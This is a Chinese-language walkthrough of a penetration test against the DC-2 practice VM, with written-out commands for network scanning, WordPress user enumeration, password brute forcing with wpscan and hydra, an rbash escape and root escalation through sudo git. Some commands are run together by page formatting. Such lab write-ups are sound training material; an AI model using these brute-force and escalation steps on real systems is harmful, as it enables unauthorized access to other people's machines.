网络安全之DC-2靶机渗透测试实战

一、靶机环境搭建

1.下载DC-2虚拟机镜像文件,解压后用VM打开。

DC-2镜像,若链接失效,关注公众号 文化仁 回复DC-2获取,或联系我获取https://pan.baidu.com/s/1gVVdEbiTkFUEOpewsn1iRg?pwd=2t1j

2.设置DC-2虚拟机的网络适配器为NAT模式,并查看其MAC硬件地址,重启后生效。

3.开启kali虚拟机

二、渗透前的信息收集

1.在kali系统中使用nmap工具扫描本网段的机器。

bash 复制代码
# nmap -sP 192.168.2.0/24**

根据扫描结果比对MAC地址可知DC-2获取到的IP地址为192.168.2.9。

2.根据IP地址对其进一步收集信息,使用nmap工具扫描其开放的端口以及开放的服务。

bash 复制代码
# nmap -A 192.168.2.9 -p 1-65535 -oN nmap.A

根据扫描结果可知,开放80、7744端口,尝试访问其IP,发现连接失败

3.添加一条本地DNS,使DC-2可以被解析为IP。

bash 复制代码
# vi /etc/hosts

再次访问

三、正式进行渗透
FLAG1

根据提示,使用cewl工具

bash 复制代码
# cewl dc-2 > pwd.dic

扫描一下网站目录,使用MSF进行网站目录扫描

bash 复制代码
# msfconsole
bash 复制代码
msf6 > use auxiliary/scanner/http/dir_scanner msf6 auxiliary(scanner/http/dir_scanner) > options

根据选项提示,设置RHOSTS目标机器IP地址

bash 复制代码
msf6 auxiliary(scanner/http/dir_scanner) > set rhosts 192.168.2.9rhostsmsf6 auxiliary(scanner/http/dir_scanner) > set threads 50threads => 50
bash 复制代码
msf6 auxiliary(scanner/http/dir_scanner) > exploit

使用wpscan漏洞扫描工具,更新wpscan

bash 复制代码
# wpscan --update

注:如果wpscan无法使用,可以尝试更换新的kali 虚拟机,安装 kali 2024.2 之后,wpscan启动成功。

bash 复制代码
# wpscan --url dc-2 -e u

wpscan 爆破用户

bash 复制代码
# wpscan --url dc-2 -U user.dic -P pwd.dic


FLAG2

访问192.168.2.9/wp-admin,使用jerry用户并用我们爆破出来的密码尝试登录。

找到flag2

根据提示我们需要另辟蹊径,想到刚开始使用nmap 扫描时,还扫出了ssh 端口7744。

利用hydra爆破ssh

bash 复制代码
# hydra -L user.dic -P pwd.dic ssh:**//192.168.2.9 -s 7744 -o hydra.ssh -vV**

查看结果:

尝试使用ssh 登录

bash 复制代码
ssh tom@192.168.2.9 -p 7744

查看当前目录文件

bash 复制代码
lscat flag3.txt

发现有rbash 命令限制

FLAG3

绕过限制

bash 复制代码
BASH_CMDS[a]=/bin/sh;a/bin/bashexport PATH=$PATH:/bin/export PATH=$PATH:/usr/bin


FLAG4

切换jerry用户

bash 复制代码
su - jerry

进入到jerry用户的家目录

执行命令,发现没有权限

FINAL-FLAG

提权,查看具有root权限的命令

bash 复制代码
sudo -l

发现git命令具有root权限,但是不需要提供给root密码。

git提权

bash 复制代码
sudo git -p --help

强制进入交互式状态,让页面缓冲区无法显示全部信息。

bash 复制代码
!/bin/bash
相关推荐
用户9623779544819 小时前
DVWA 靶场实验报告 (High Level)
安全
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——在 n8n 中构建你的第一个 AI 工作流
人工智能·安全·agent
数据智能老司机1 天前
用于进攻性网络安全的智能体 AI——智能体 AI 入门
人工智能·安全·agent
用户962377954481 天前
DVWA 靶场实验报告 (Medium Level)
安全
red1giant_star1 天前
S2-067 漏洞复现:Struts2 S2-067 文件上传路径穿越漏洞
安全
用户962377954481 天前
DVWA Weak Session IDs High 的 Cookie dvwaSession 为什么刷新不出来?
安全
cipher3 天前
ERC-4626 通胀攻击:DeFi 金库的"捐款陷阱"
前端·后端·安全
一次旅行6 天前
网络安全总结
安全·web安全
red1giant_star6 天前
手把手教你用Vulhub复现ecshop collection_list-sqli漏洞(附完整POC)
安全
ZeroNews内网穿透6 天前
谷歌封杀OpenClaw背后:本地部署或是出路
运维·服务器·数据库·安全